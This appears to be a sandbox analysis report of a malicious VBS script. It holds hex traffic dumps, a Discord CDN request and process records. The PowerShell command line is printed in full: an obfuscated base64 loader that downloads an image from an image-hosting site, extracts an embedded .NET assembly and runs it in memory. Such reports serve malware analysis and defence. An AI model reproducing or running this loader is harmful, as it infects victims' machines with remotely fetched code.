      2024-05-27 13:21:09 UTC1369INData Raw: 19 e7 48 f4 c5 56 48 d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7
      Data Ascii: HVH%VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg
      2024-05-27 13:21:09 UTC1369INData Raw: 89 15 06 c9 2d 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61
      Data Ascii: -\mTr7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a
      2024-05-27 13:21:09 UTC1369INData Raw: d1 d5 d7 07 8b 3e f8 03 32 f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62
      Data Ascii: >2HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b
      2024-05-27 13:21:09 UTC1369INData Raw: df c3 1b 3a cd 34 1e 1a 3c a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10
      Data Ascii: :4<RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>i
      2024-05-27 13:21:09 UTC1369INData Raw: 9b f8 5a b4 72 3a 06 01 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87
      Data Ascii: Zr:T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk}
      2024-05-27 13:21:09 UTC1369INData Raw: 31 03 82 31 dd 47 db 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1
      Data Ascii: 11Gvu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8r
      2024-05-27 13:21:09 UTC1369INData Raw: 1b 0b d0 9f 6c 57 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21
      Data Ascii: lW_4/mnq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};|1zwr80/`vI<R@i*$!
      2024-05-27 13:21:09 UTC1369INData Raw: 55 5a b1 de f9 ce 8b 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d
      Data Ascii: UZ@t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hC


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      3192.168.2.449733162.159.134.2334437476C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      2024-05-27 13:21:18 UTC224OUTGET /attachments/1235627023511191643/1243621113322541056/windows.txt?ex=665223ea&is=6650d26a&hm=4b9144698e8d9012486b1696a279a1df3aeb5a788c309e00168f0be8e912d5ff& HTTP/1.1
      Host: cdn.discordapp.com
      Connection: Keep-Alive
      2024-05-27 13:21:18 UTC1051INHTTP/1.1 404 Not Found
      Date: Mon, 27 May 2024 13:21:18 GMT
      Content-Type: text/plain;charset=UTF-8
      Content-Length: 36
      Connection: close
      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
      Set-Cookie: __cf_bm=yYiPXt67ZhXzMcLQSY6YnCHOUwz1Dle_47cT4p0pUbs-1716816078-1.0.1.1-t9qn7fneEPezms5fx9bM5LvaFVWJZGcbzMw8VZ15VKZqpW8z64P9cPEzy28BElW1z07qGH3IYYCpgUTDEEc5Iw; path=/; expires=Mon, 27-May-24 13:51:18 GMT; domain=.discordapp.com; HttpOnly; Secure
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=smxe2mv4co11BudZ9apoC1dYW%2Bu%2B8KVRjyssF5MfxF0B7xWiCnNGv6AyKW2yhs8lZL65clOb2dt%2Fh6GZadc4NtWKMJMZPL%2BhazqH6vozw5QXTLlNvgWYiKn2%2BYlPjmdPg2QpTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Set-Cookie: _cfuvid=RuYA0qsDTafElSgm.7zUJR2s4flhHtiR6VWm8WVK9Ok-1716816078699-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
      Server: cloudflare
      CF-RAY: 88a64eabbadb429a-EWR
      alt-svc: h3=":443"; ma=86400
      2024-05-27 13:21:18 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
      Data Ascii: This content is no longer available.


      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Click to jump to process

      Target ID:0
      Start time:09:21:00
      Start date:27/05/2024
      Path:C:\Windows\System32\wscript.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\las.vbs"
      Imagebase:0x7ff6844f0000
      File size:170'496 bytes
      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:1
      Start time:09:21:02
      Start date:27/05/2024
      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreCYDgTreZgBmDgTreDUDgTreZDgTreDgTreyDgTreDEDgTreOQBlDgTreDgDgTreZQBiDgTreDDgTreDgTreZgDgTre4DgTreDYDgTreMQDgTrewDgTreDDgTreDgTreZQDgTre5DgTreDDgTreDgTreMwBjDgTreDgDgTreODgTreDgTre3DgTreGEDgTreNQBiDgTreGUDgTreYQDgTrezDgTreGYDgTreZDgTreDgTrexDgTreGEDgTreOQDgTre3DgTreDIDgTreYQDgTre2DgTreDkDgTreNgDgTrexDgTreGIDgTreNgDgTre4DgTreDQDgTreMgDgTrexDgTreDDgTreDgTreOQBkDgTreDgDgTreZQDgTre4DgTreDkDgTreNgDgTre0DgTreDQDgTreMQDgTre5DgTreGIDgTreNDgTreDgTre9DgTreG0DgTreaDgTreDgTremDgTreGEDgTreNgDgTreyDgTreGQDgTreMDgTreDgTre1DgTreDYDgTreNgDgTre9DgTreHMDgTreaQDgTremDgTreGEDgTreZQDgTrezDgTreDIDgTreMgDgTre1DgTreDYDgTreNgDgTre9DgTreHgDgTreZQDgTre/DgTreHQDgTreeDgTreB0DgTreC4DgTrecwB3DgTreG8DgTreZDgTreBuDgTreGkDgTredwDgTrevDgTreDYDgTreNQDgTrewDgTreDEDgTreNDgTreDgTre1DgTreDIDgTreMgDgTrezDgTreDMDgTreMQDgTrexDgTreDEDgTreMgDgTre2DgTreDMDgTreNDgTreDgTreyDgTreDEDgTreLwDgTrezDgTreDQDgTreNgDgTrexDgTreDkDgTreMQDgTrexDgTreDEDgTre